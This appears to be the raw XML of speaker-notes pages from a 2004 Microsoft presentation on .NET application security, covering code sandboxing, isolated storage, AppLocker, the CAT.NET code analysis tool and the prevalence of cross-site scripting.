            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328709" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Rather than allowing a whole application maximum privileges, it is possible to sandbox privileged code while retaining partial trust for the Web application as a whole.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The .NET sandboxing approach is as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Encapsulate the resource access in a wrapper assembly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Demand and then assert the relevant permission prior to accessing the resource.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Add the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>AllowPartiallyTrustedCallersAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> to the assembly. This is necessary to allow it to be called from a partial-trust Web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Install the wrapper assembly in the global assembly cache (GAC). This automatically assigns the assembly full trust.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Configure the Web application to use an appropriate trust level.</a:t>
            </a:r>
          </a:p>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dirty="0" smtClean="0"/>
              <a:t>Both assemblies and application domains receive permission grants based on evidence.</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Header Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>MGB 2003</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>© 2004 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DEE41DBC-2AE9-49CD-9075-8D71BA3D720B}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>20</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80975" marR="0" indent="-180975" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When many .NET processes are run, there will be a lot of libraries that are duplicated in separate address spaces, all taking up valuable system resources. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Header Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>MGB 2003</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>© 2004 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DEE41DBC-2AE9-49CD-9075-8D71BA3D720B}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>21</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dirty="0" smtClean="0"/>
              <a:t>Control Panel -&gt; System and Security - &gt; Administrative Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Header Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>MGB 2003</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>© 2004 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DEE41DBC-2AE9-49CD-9075-8D71BA3D720B}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>23</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A99FBBB9-F709-47D6-AC8C-21EDEFDDED99}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441346" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441347" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Launch Win 7 Windows Application Locker</a:t>
            </a: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ABBAEF17-6A46-4280-90CE-B07C9695E38C}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189444" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189445" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>For some applications, such as downloaded Web applications and code that may come from sources that are not trusted, the basic file system does not provide the necessary isolation and safety. Isolated storage is a data storage mechanism that provides isolation and safety by defining standardized ways of associating code with saved data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Administrators can use tools that are designed to manipulate isolated storage to configure file storage space, set security policies, and to delete unused data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>With isolated storage, developers no longer have to invent unique paths to specify safe locations in the file system. Developers can now access safe locations by using either the application's identity or the user's identity. The code sample on the slide show an example of how to access the isolated storage based on a user's identity.</a:t>
            </a:r>
          </a:p>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s-US" dirty="0" smtClean="0"/>
              <a:t>http://www.microsoft.com/downloads/details.aspx?familyid=9AEAA970-F281-4FB0-ABA1-D59D7ED09772&amp;displaylang=en</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Header Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>MGB 2003</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>© 2004 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DEE41DBC-2AE9-49CD-9075-8D71BA3D720B}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>29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2437C95D-7AD5-4D5B-AA2D-E9F8BF31CD24}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="381956" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="381957" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>In this agenda topic, we will introduce application security by using the Microsoft® .NET Framework. Specifically, we will discuss:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>.NET Framework security features.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Code access security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Role-based security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cryptography.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Securing Microsoft ASP.NET Web applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Securing ASP.NET Web services.</a:t>
            </a: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s-US" dirty="0" smtClean="0"/>
              <a:t>http://www.microsoft.com/downloads/details.aspx?familyid=9AEAA970-F281-4FB0-ABA1-D59D7ED09772&amp;displaylang=en</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CAT.NET is a snap-in to the Visual Studio IDE that helps you identify security flaws within a managed code (C#, Visual Basic .NET, J#) application you are developing. It does so by scanning the binary and/or assembly of the application, and tracing the data flow among its statements, methods, and assemblies. This includes indirect data types such as property assignments and instance tainting operations. The engine works by reading the target assembly and all reference assemblies used in the application -- module-by-module -- and then analyzing all of the methods contained within each. It finally displays the issues its finds in a list that you can use to jump directly to the places in your application's source code where those issues were found. The following rules are currently support by this version of the tool. - Cross Site Scripting - SQL Injection - Process Command Injection - File Canonicalization - Exception Information - LDAP Injection - XPATH Injection - Redirection to User Controlled </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Header Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>MGB 2003</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>© 2004 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DEE41DBC-2AE9-49CD-9075-8D71BA3D720B}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>31</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dirty="0" smtClean="0"/>
              <a:t>Right Click on Project then Run Code Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Header Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>MGB 2003</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>© 2004 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DEE41DBC-2AE9-49CD-9075-8D71BA3D720B}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>32</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dirty="0" smtClean="0"/>
              <a:t>XSS surpassed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3" action="ppaction://hlinkfile" tooltip="Buffer overflow"/>
              </a:rPr>
              <a:t>buffer overflows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to become the most common publicly-reported security vulnerability in recent years, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>[5]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and at least 68% of websites are likely o</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pen to XSS attacks on their users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Header Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>MGB 2003</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>© 2004 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DEE41DBC-2AE9-49CD-9075-8D71BA3D720B}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>33</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dirty="0" smtClean="0"/>
              <a:t>XSS surpassed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3" action="ppaction://hlinkfile" tooltip="Buffer overflow"/>
              </a:rPr>
              <a:t>buffer overflows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to become the most common publicly-reported security vulnerability in recent years, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>[5]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and at least 68% of websites are likely o</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pen to XSS attacks on their users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://ha.ckers.org/xss.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Header Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>MGB 2003</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>© 2004 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
